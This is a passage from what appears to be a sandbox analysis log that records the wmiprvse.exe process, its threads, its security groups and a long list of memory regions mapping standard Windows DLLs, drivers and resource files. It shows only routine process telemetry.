0x1 [0274.484] DllCanUnloadNow () returned 0x1 Thread: id = 107 os_tid = 0x170 Thread: id = 108 os_tid = 0xc98 Thread: id = 109 os_tid = 0xc8c Thread: id = 110 os_tid = 0xf7c Thread: id = 111 os_tid = 0x9c0 Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x2010b000" os_pid = "0xe18" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x274" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00038627" [0xc000000f] Region: id = 2750 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2751 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2752 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2753 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2754 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2755 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2756 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2757 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2758 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2759 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2760 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2761 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2762 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2763 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2764 start_va = 0x410000 end_va = 0x414fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2765 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2766 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 2767 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2768 start_va = 0x450000 end_va = 0x452fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 2769 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2770 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 2771 start_va = 0x5f0000 end_va = 0x926fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2772 start_va = 0x930000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 2773 start_va = 0xac0000 end_va = 0xc40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 2774 start_va = 0xc50000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 2775 start_va = 0xd90000 end_va = 0xe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 2776 start_va = 0xe90000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 2777 start_va = 0x1010000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 2778 start_va = 0x1110000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2779 start_va = 0x1210000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 2780 start_va = 0x1290000 end_va = 0x130ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 2781 start_va = 0x1310000 end_va = 0x138ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 2782 start_va = 0x1410000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 2783 start_va = 0x1490000 end_va = 0x150ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001490000" filename = "" Region: id = 2784 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2785 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2786 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2787 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2788 start_va = 0x7ff61e550000 end_va = 0x7ff61e5cffff monitored = 0 entry_point = 0x7ff61e565f50 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 2789 start_va = 0x7ffd8ecc0000 end_va = 0x7ffd8ee8efff monitored = 1 entry_point = 0x7ffd8ece7df0 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 2790 start_va = 0x7ffd91320000 end_va = 0x7ffd9136dfff monitored = 0 entry_point = 0x7ffd91331ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2791 start_va = 0x7ffd92210000 end_va = 0x7ffd9221dfff monitored = 0 entry_point = 0x7ffd92211da0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 2792 start_va = 0x7ffd97150000 end_va = 0x7ffd97165fff monitored = 0 entry_point = 0x7ffd971555e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2793 start_va = 0x7ffd972c0000 end_va = 0x7ffd972e4fff monitored = 0 entry_point = 0x7ffd972c9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2794 start_va = 0x7ffd972f0000 end_va = 0x7ffd97303fff monitored = 0 entry_point = 0x7ffd972f1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2795 start_va = 0x7ffd97350000 end_va = 0x7ffd97445fff monitored = 0 entry_point = 0x7ffd97389590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2796 start_va = 0x7ffd9b340000 end_va = 0x7ffd9b3befff monitored = 1 entry_point = 0x7ffd9b357110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2797 start_va = 0x7ffd9f020000 end_va = 0x7ffd9f031fff monitored = 0 entry_point = 0x7ffd9f023580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2798 start_va = 0x7ffda18b0000 end_va = 0x7ffda18c5fff monitored = 0 entry_point = 0x7ffda18b1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2799 start_va = 0x7ffda62f0000 end_va = 0x7ffda6302fff monitored = 0 entry_point = 0x7ffda62f2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2800 start_va = 0x7ffda65d0000 end_va = 0x7ffda65f6fff monitored = 0 entry_point = 0x7ffda65d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2801 start_va = 0x7ffda7100000 end_va = 0x7ffda7179fff monitored = 0 entry_point = 0x7ffda7121a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 2802 start_va = 0x7ffda7830000 end_va = 0x7ffda785cfff monitored = 0 entry_point = 0x7ffda7849d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2803 start_va = 0x7ffda79c0000 end_va = 0x7ffda7a15fff monitored = 0 entry_point = 0x7ffda79d0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2804 start_va = 0x7ffda7a40000 end_va = 0x7ffda7a68fff monitored = 0 entry_point = 0x7ffda7a54530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2805 start_va = 0x7ffda7bb0000 end_va = 0x7ffda7bfafff monitored = 0 entry_point = 0x7ffda7bb35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2806 start_va = 0x7ffda7c00000 end_va = 0x7ffda7c0efff monitored = 0 entry_point = 0x7ffda7c03210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2807 start_va = 0x7ffda7c30000 end_va = 0x7ffda7c3ffff monitored = 0 entry_point = 0x7ffda7c356e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2808 start_va = 0x7ffda7cd0000 end_va = 0x7ffda7d39fff monitored = 0 entry_point = 0x7ffda7d06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2809 start_va = 0x7ffda7d40000 end_va = 0x7ffda7f27fff monitored = 0 entry_point = 0x7ffda7d6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2810 start_va = 0x7ffda7f30000 end_va = 0x7ffda80f6fff monitored = 0 entry_point = 0x7ffda7f8db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2811 start_va = 0x7ffda8100000 end_va = 0x7ffda8142fff monitored = 0 entry_point = 0x7ffda8114b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2812 start_va = 0x7ffda8a30000 end_va = 0x7ffda8adcfff monitored = 0 entry_point = 0x7ffda8a481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2813 start_va = 0x7ffda8ae0000 end_va = 0x7ffda8b86fff monitored = 0 entry_point = 0x7ffda8aeb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2814 start_va = 0x7ffda8ba0000 end_va = 0x7ffda8cbbfff monitored = 0 entry_point = 0x7ffda8be02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2815 start_va = 0x7ffda8cc0000 end_va = 0x7ffda8d80fff monitored = 0 entry_point = 0x7ffda8ce0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2816 start_va = 0x7ffda8ea0000 end_va = 0x7ffda8ff5fff monitored = 0 entry_point = 0x7ffda8eaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2817 start_va = 0x7ffda9000000 end_va = 0x7ffda927cfff monitored = 0 entry_point = 0x7ffda90d4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2818 start_va = 0x7ffda9800000 end_va = 0x7ffda986afff monitored = 0 entry_point = 0x7ffda98190c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2819 start_va = 0x7ffdaae30000 end_va = 0x7ffdaaeccfff monitored = 0 entry_point = 0x7ffdaae378a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2820 start_va = 0x7ffdaaee0000 end_va = 0x7ffdaaf86fff monitored = 0 entry_point = 0x7ffdaaef58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2821 start_va = 0x7ffdab030000 end_va = 0x7ffdab08afff monitored = 0 entry_point = 0x7ffdab0438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2822 start_va = 0x7ffdab400000 end_va = 0x7ffdab585fff monitored = 0 entry_point = 0x7ffdab44ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2823 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2852 start_va = 0x570000 end_va = 0x572fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2853 start_va = 0x580000 end_va = 0x587fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2855 start_va = 0x590000 end_va = 0x595fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2882 start_va = 0x1510000 end_va = 0x160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 2883 start_va = 0x5a0000 end_va = 0x5b5fff monitored = 0 entry_point = 0x5b0420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 2884 start_va = 0x5c0000 end_va = 0x5c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 2885 start_va = 0x5a0000 end_va = 0x5b5fff monitored = 0 entry_point = 0x5b0420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 2886 start_va = 0x5c0000 end_va = 0x5c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 2887 start_va = 0x5a0000 end_va = 0x5b5fff monitored = 0 entry_point = 0x5b0420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 2888 start_va = 0x5c0000 end_va = 0x5c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 2889 start_va = 0x5a0000 end_va = 0x5b5fff monitored = 0 entry_point = 0x5b0420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 2890 start_va = 0x5c0000 end_va = 0x5c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 2891 start_va = 0x5a0000 end_va = 0x5b9fff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 2892 start_va = 0x5c0000 end_va = 0x5c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 2893 start_va = 0x5a0000 end_va = 0x5b9fff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 2894 start_va = 0x5c0000 end_va = 0x5c5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 2895 start_va = 0x5a0000 end_va = 0x5cafff monitored = 0 entry_point = 0x5bd000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 2896 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 2897 start_va = 0x16d0000 end_va = 0x1acafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016d0000" filename = "" Region: id = 2898 start_va = 0x5a0000 end_va = 0x5cafff monitored = 0 entry_point = 0x5bd000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 2899 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 2900 start_va = 0x5a0000 end_va = 0x5cafff monitored = 0 entry_point = 0x5bd000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 2901 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 2902 start_va = 0x5a0000 end_va = 0x5cafff monitored = 0 entry_point = 0x5bd000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 2903 start_va = 0x5d0000 end_va = 0x5d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 2904 start_va = 0x5a0000 end_va = 0x5c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 2905 start_va = 0x1ad0000 end_va = 0x1bb3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 2906 start_va = 0x5a0000 end_va = 0x5c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 2907 start_va = 0x1ad0000 end_va = 0x1bb3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 2908 start_va = 0x5a0000 end_va = 0x5a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "afd.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\afd.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\afd.sys.mui") Region: id = 2909 start_va = 0x1610000 end_va = 0x16a2fff monitored = 0 entry_point = 0x1689000 region_type = mapped_file name = "afd.sys" filename = "\\Windows\\System32\\drivers\\afd.sys" (normalized: "c:\\windows\\system32\\drivers\\afd.sys") Region: id = 2910 start_va = 0x5a0000 end_va = 0x5a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "afd.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\afd.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\afd.sys.mui") Region: id = 2911 start_va = 0x1610000 end_va = 0x16a2fff monitored = 0 entry_point = 0x1689000 region_type = mapped_file name = "afd.sys" filename = "\\Windows\\System32\\drivers\\afd.sys" (normalized: "c:\\windows\\system32\\drivers\\afd.sys") Region: id = 2912 start_va = 0x5a0000 end_va = 0x5a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fvevol.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\fvevol.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\fvevol.sys.mui") Region: id = 2913 start_va = 0x1610000 end_va = 0x16b0fff monitored = 0 entry_point = 0x16a3000 region_type = mapped_file name = "fvevol.sys" filename = "\\Windows\\System32\\drivers\\fvevol.sys" (normalized: "c:\\windows\\system32\\drivers\\fvevol.sys") Region: id = 2914 start_va = 0x5a0000 end_va = 0x5a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fvevol.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\fvevol.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\fvevol.sys.mui") Region: id = 2915 start_va = 0x1610000 end_va = 0x16b0fff monitored = 0 entry_point = 0x16a3000 region_type = mapped_file name = "fvevol.sys" filename = "\\Windows\\System32\\drivers\\fvevol.sys" (normalized: "c:\\windows\\system32\\drivers\\fvevol.sys") Region: id = 2916 start_va = 0x5a0000 end_va = 0x5aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 2917 start_va = 0x1610000 end_va = 0x1695fff monitored = 0 entry_point = 0x1681000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 2918 start_va = 0x5a0000 end_va = 0x5aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 2919 start_va = 0x1610000 end_va = 0x1695fff monitored = 0 entry_point = 0x1681000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 2920 start_va = 0x5a0000 end_va = 0x5aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 2921 start_va = 0x1610000 end_va = 0x1695fff monitored = 0 entry_point = 0x1681000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 2922 start_va = 0x5a0000 end_va = 0x5aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 2923 start_va = 0x1610000 end_va = 0x1695fff monitored = 0 entry_point = 0x1681000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 2924 start_va = 0x5a0000 end_va = 0x5aefff monitored = 0 entry_point = 0x5a36e0 region_type = mapped_file name = "dmvsc.sys" filename = "\\Windows\\System32\\drivers\\dmvsc.sys" (normalized: "c:\\windows\\system32\\drivers\\dmvsc.sys") Region: id = 2925 start_va = 